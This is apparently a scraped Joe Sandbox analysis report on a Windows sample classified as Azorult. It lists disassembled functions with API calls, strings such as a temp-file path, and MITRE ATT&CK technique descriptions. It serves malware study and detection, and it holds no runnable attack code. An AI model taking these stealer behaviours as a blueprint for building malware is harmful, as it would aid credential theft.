GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58

Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58

Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A

Strings

%TEMP%\curbuf.dat, xrefs: 0040DE1C, 0040DE44, 0040DE67
LLA, xrefs: 0040DE19, 0040DE26

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat$LLA
API String ID: 5292005-3909751444
Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99

Function 0042A749 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0042A76B
__calloc_crt.LIBCMT ref: 0042A784

Strings

h"D, xrefs: 0042A7B0
X D, xrefs: 0042A7ED

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __calloc_crt
String ID: X D$h"D
API String ID: 3494438863-2552160841
Opcode ID: 28c858932b36068d7a04bc67a8e3b0624845a86d6d6cadb7adb530d3ac182b6a
Instruction ID: b158818b0811aef02535f2a4cc19cebd052bd56d44457835a3eb32c192543565
Opcode Fuzzy Hash: 28c858932b36068d7a04bc67a8e3b0624845a86d6d6cadb7adb530d3ac182b6a
Instruction Fuzzy Hash: C411E7327042219BF7148B1EBCC066263A5E7C47287A4413BE920CF2E1E738D892868E

Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58

Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58

Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E

Strings

user32.dll, xrefs: 00416673
EnumDisplayDevicesW, xrefs: 0041666E

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesW$user32.dll
API String ID: 2574300362-1693391355
Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58

Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58

Function 0042EBA4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042EBD8
__isleadbyte_l.LIBCMT ref: 0042EC0B
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,)7B,?), ref: 0042EC3C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,)7B,?), ref: 0042ECAA

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d3eb6d498bf72d06f08981854be30ef5055412057725443a5c24876286db0bce
Instruction ID: d5fb20768fc2cd7e38da7f38bdfe34a942912e4a9a8a4cdf070304374513b48e
Opcode Fuzzy Hash: d3eb6d498bf72d06f08981854be30ef5055412057725443a5c24876286db0bce
Instruction Fuzzy Hash: 5F31D330B04266EFCB20DFA7E8809BA3BA5FF01310B5485AAF4658B291D335D940DB59

Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Function 004277E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 0042783E

Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69

Strings

B, xrefs: 00427837

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: febb268309658b2f8be58bfae30c55cbfe957b41178bad1dcf1cbf59c28180b6
Instruction ID: 99b51ff85c7b90f69104664c4d9504e165f5f5fb7a3773e46ce12f66d1d17e3f
Opcode Fuzzy Hash: febb268309658b2f8be58bfae30c55cbfe957b41178bad1dcf1cbf59c28180b6
Instruction Fuzzy Hash: 3C01C471A042299BDF00AFA5EC01BEE7BF4FB44364F50415AF824B6281D7389501CB79

Function 0042776D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 00427778
__invoke_watson.LIBCMT ref: 00427794

Strings

s[B, xrefs: 00427785

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: s[B
API String ID: 4034010525-1751886648
Opcode ID: 9aeacf2eaa45aa4d3a915217aa4e5a484a87f459dec0245bd515257041a31977
Instruction ID: 6fbffe8eda2b7a47f2c06d09d45c96a618974e1f3a447204240d23390952cdbc
Opcode Fuzzy Hash: 9aeacf2eaa45aa4d3a915217aa4e5a484a87f459dec0245bd515257041a31977
Instruction Fuzzy Hash: C2E0EC32604159BBDF012F62ED4A86B3F66EB84350F944465FE1485132DB3AD831EB98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 12E56QE1Fc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

Windows Analysis Report
12E56QE1Fc.exe

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Function 00418124 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269
libraryloadernetworkCOMMON

Function 00418688 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 375
libraryloadernetworkCOMMON

Function 00785374 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
COMMON

Function 0078537F Relevance: 3.8, Strings: 3, Instructions: 90
COMMON

Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312
libraryloaderCOMMON

Function 00423704 Relevance: 102.5, APIs: 17, Strings: 41, Instructions: 973
synchronizationtimesleepCOMMON

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Function 00784A90 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347
memoryCOMMON

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Function 007850C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168
libraryCOMMON

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON